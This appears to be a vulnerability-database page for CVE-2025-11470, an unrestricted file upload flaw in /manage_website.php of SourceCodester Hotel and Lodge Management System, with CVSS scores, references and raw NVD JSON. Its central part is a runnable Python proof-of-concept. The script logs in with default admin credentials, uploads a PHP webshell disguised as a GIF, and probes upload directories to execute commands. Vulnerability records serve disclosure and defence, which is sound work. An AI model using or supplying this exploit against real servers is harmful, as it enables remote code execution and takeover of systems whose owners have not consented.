CVE-2025-11470

Description

A security vulnerability has been detected in SourceCodester Hotel and Lodge Management System up to 1.0. The impacted element is an unknown function of the file /manage_website.php. The manipulation of the argument website_image/back_login_image leads to unrestricted upload. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:nikhil-bhalerao:hotel_and_lodge_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Hotel and Lodge Management System <= 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11470 PoC - SourceCodester Hotel and Lodge Management System
# Unrestricted File Upload in /manage_website.php

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

TARGET_URL = "http://target.com"
ADMIN_LOGIN_URL = f"{TARGET_URL}/login.php"
UPLOAD_URL = f"{TARGET_URL}/manage_website.php"
USERNAME = "admin"
PASSWORD = "admin123"

# Create a malicious PHP webshell disguised as an image
# GIF89a header + PHP code
WEBSHELL_CONTENT = b"GIF89a;\n<?php system($_GET['cmd']); ?>"

session = requests.Session()

# Step 1: Login as administrator
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "login": "submit"
}
login_response = session.post(ADMIN_LOGIN_URL, data=login_data)
print(f"[*] Login Status: {login_response.status_code}")

# Step 2: Upload malicious file via website_image parameter
multipart_data = MultipartEncoder(
    fields={
        "website_image": ("shell.php", WEBSHELL_CONTENT, "image/gif"),
        "back_login_image": ("back.php", WEBSHELL_CONTENT, "image/gif"),
        "update": "Update"
    }
)

headers = {
    "Content-Type": multipart_data.content_type,
    "Referer": UPLOAD_URL
}

upload_response = session.post(UPLOAD_URL, data=multipart_data, headers=headers)
print(f"[*] Upload Status: {upload_response.status_code}")

# Step 3: Access the uploaded webshell
# Common upload paths to try
upload_paths = [
    f"{TARGET_URL}/uploads/shell.php?cmd=id",
    f"{TARGET_URL}/upload/shell.php?cmd=id",
    f"{TARGET_URL}/images/shell.php?cmd=id",
    f"{TARGET_URL}/shell.php?cmd=id"
]

for path in upload_paths:
    try:
        shell_response = session.get(path, timeout=5)
        if shell_response.status_code == 200 and "uid=" in shell_response.text:
            print(f"[+] Shell found at: {path}")
            print(f"[+] Output: {shell_response.text}")
            break
    except Exception as e:
        continue

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11470
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11470
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11470/
[4] VulDB https://vuldb.com/cve/CVE-2025-11470
[5] https://github.com/TThuyyy/cve1/issues/13
[6] https://vuldb.com/?ctiid.327588
[7] https://vuldb.com/?id.327588
[8] https://vuldb.com/?submit.665462
[9] https://www.sourcecodester.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11470", "sourceIdentifier": "[email protected]", "published": "2025-10-08T10:15:37.427", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in SourceCodester Hotel and Lodge Management System up to 1.0. The impacted element is an unknown function of the file /manage_website.php. The manipulation of the argument website_image/back_login_image leads to unrestricted upload. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nikhil-bhalerao:hotel_and_lodge_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "01868A61-18A4-4C5D-B260-54D49603028E"}]}]}], "references": [{"url": "https://github.com/TThuyyy/cve1/issues/13", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327588", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327588", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665462", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}]}}